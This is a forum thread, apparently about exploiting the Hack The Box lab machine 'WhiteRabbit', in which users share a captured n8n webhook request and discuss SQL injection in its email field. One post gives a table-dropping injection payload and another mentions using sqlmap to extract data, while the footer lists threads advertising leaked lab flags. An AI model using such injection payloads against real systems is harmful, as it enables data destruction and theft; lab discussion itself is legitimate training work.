Possibly Related Threads…

unrecognized · Apr 06, 2025, 06:02 AM

sql injection in n8n endpoint.

zippo99 · Apr 06, 2025, 06:06 AM

im bob but where's the flag... ),:

AncientNull · Apr 06, 2025, 06:40 AM

(Apr 06, 2025, 06:02 AM)unrecognized Wrote: sql injection in n8n endpoint.

Are you talking about the auth endpoint, or the webhook in the wiki?

samuelballsiu1 · Apr 06, 2025, 07:44 AM

(Apr 06, 2025, 06:02 AM)unrecognized Wrote: sql injection in n8n endpoint.

I can't find the n8n endpoint, which you mentioned. Can you please be more clear?

date202511 · Apr 06, 2025, 07:47 AM

Did I miss something important?

jsvensson · Apr 06, 2025, 07:54 AM

(Apr 06, 2025, 07:44 AM)samuelballsiu1 Wrote:
(Apr 06, 2025, 06:02 AM)unrecognized Wrote: sql injection in n8n endpoint.

I can't find the n8n endpoint, which you mentioned. Can you please be more clear?

http://a668910b5514e.whiterabbit.htb/en/...h_webhooks

POST /webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d HTTP/1.1
Host: 28efa8f7df.whiterabbit.htb -- this is n8n
x-gophish-signature: sha256=cf4651463d8bc629b9b411c58480af5a9968ba05fca83efa03a21b2cecd1c2dd
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 81

{
"campaign_id": 1,
"email": "test@ex.com",
"message": "Clicked Link"
}

i think in this POST is sqli but can't get it work - maybe somebody explain how to do it

AncientNull · Apr 06, 2025, 07:58 AM

(Apr 06, 2025, 07:54 AM)jsvensson Wrote:
(Apr 06, 2025, 07:44 AM)samuelballsiu1 Wrote:
(Apr 06, 2025, 06:02 AM)unrecognized Wrote: sql injection in n8n endpoint.

I can't find the n8n endpoint, which you mentioned. Can you please be more clear?
http://a668910b5514e.whiterabbit.htb/en/...h_webhooks

POST /webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d HTTP/1.1
Host: 28efa8f7df.whiterabbit.htb -- this is n8n
x-gophish-signature: sha256=cf4651463d8bc629b9b411c58480af5a9968ba05fca83efa03a21b2cecd1c2dd
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 81

{
"campaign_id": 1,
"email": "test@ex.com",
"message": "Clicked Link"
}

i think in this POST is sqli but can't get it work - maybe somebody explain how to do it

The email field is injectable, I was able to drop a table, just not able to get output. You need to set the gophish signature with the secret in the json. Anyone have a known valid email for the box?

jsvensson · Apr 06, 2025, 08:02 AM

(Apr 06, 2025, 07:58 AM)AncientNull Wrote:
(Apr 06, 2025, 07:54 AM)jsvensson Wrote:
(Apr 06, 2025, 07:44 AM)samuelballsiu1 Wrote:
(Apr 06, 2025, 06:02 AM)unrecognized Wrote: sql injection in n8n endpoint.

I can't find the n8n endpoint, which you mentioned. Can you please be more clear?
http://a668910b5514e.whiterabbit.htb/en/...h_webhooks

POST /webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d HTTP/1.1
Host: 28efa8f7df.whiterabbit.htb -- this is n8n
x-gophish-signature: sha256=cf4651463d8bc629b9b411c58480af5a9968ba05fca83efa03a21b2cecd1c2dd
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 81

{
"campaign_id": 1,
"email": "test@ex.com",
"message": "Clicked Link"
}

i think in this POST is sqli but can't get it work - maybe somebody explain how to do it

The email field is injectable, I was able to drop a table, just not able to get output. You need to set the gophish signature with the secret in the json. Anyone have a known valid email for the box?

I knew about signature, what is your payload to drop table?

AncientNull · Apr 06, 2025, 08:06 AM

(Apr 06, 2025, 08:02 AM)jsvensson Wrote:
(Apr 06, 2025, 07:58 AM)AncientNull Wrote:
(Apr 06, 2025, 07:54 AM)jsvensson Wrote:
(Apr 06, 2025, 07:44 AM)samuelballsiu1 Wrote:
(Apr 06, 2025, 06:02 AM)unrecognized Wrote: sql injection in n8n endpoint.

I can't find the n8n endpoint, which you mentioned. Can you please be more clear?
http://a668910b5514e.whiterabbit.htb/en/...h_webhooks

POST /webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d HTTP/1.1
Host: 28efa8f7df.whiterabbit.htb -- this is n8n
x-gophish-signature: sha256=cf4651463d8bc629b9b411c58480af5a9968ba05fca83efa03a21b2cecd1c2dd
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 81

{
"campaign_id": 1,
"email": "test@ex.com",
"message": "Clicked Link"
}

i think in this POST is sqli but can't get it work - maybe somebody explain how to do it

The email field is injectable, I was able to drop a table, just not able to get output. You need to set the gophish signature with the secret in the json. Anyone have a known valid email for the box?

I knew about signature, what is your payload to drop table?

I was able to drop the victims table with "test@ex.com"; DROP TABLE victims;--"
DON'T do that unless you want to restart the box. I think without a valid email we will always get "Info: User is not in database" back.

aryphowake · Apr 06, 2025, 08:08 AM

With SQLi you can extract juicy data. The signature can be calculated using sqlmap and the eval param

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	94	8,556	24 minutes ago Last Post: d39ug
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	26	2,557	34 minutes ago Last Post: d39ug
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	37	3,180	58 minutes ago Last Post: xosec
	CBBH Write Ups	hiddenhacker	26	6,629	1 hour ago Last Post: d39ug
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	606	94,231	1 hour ago Last Post: Gotoschool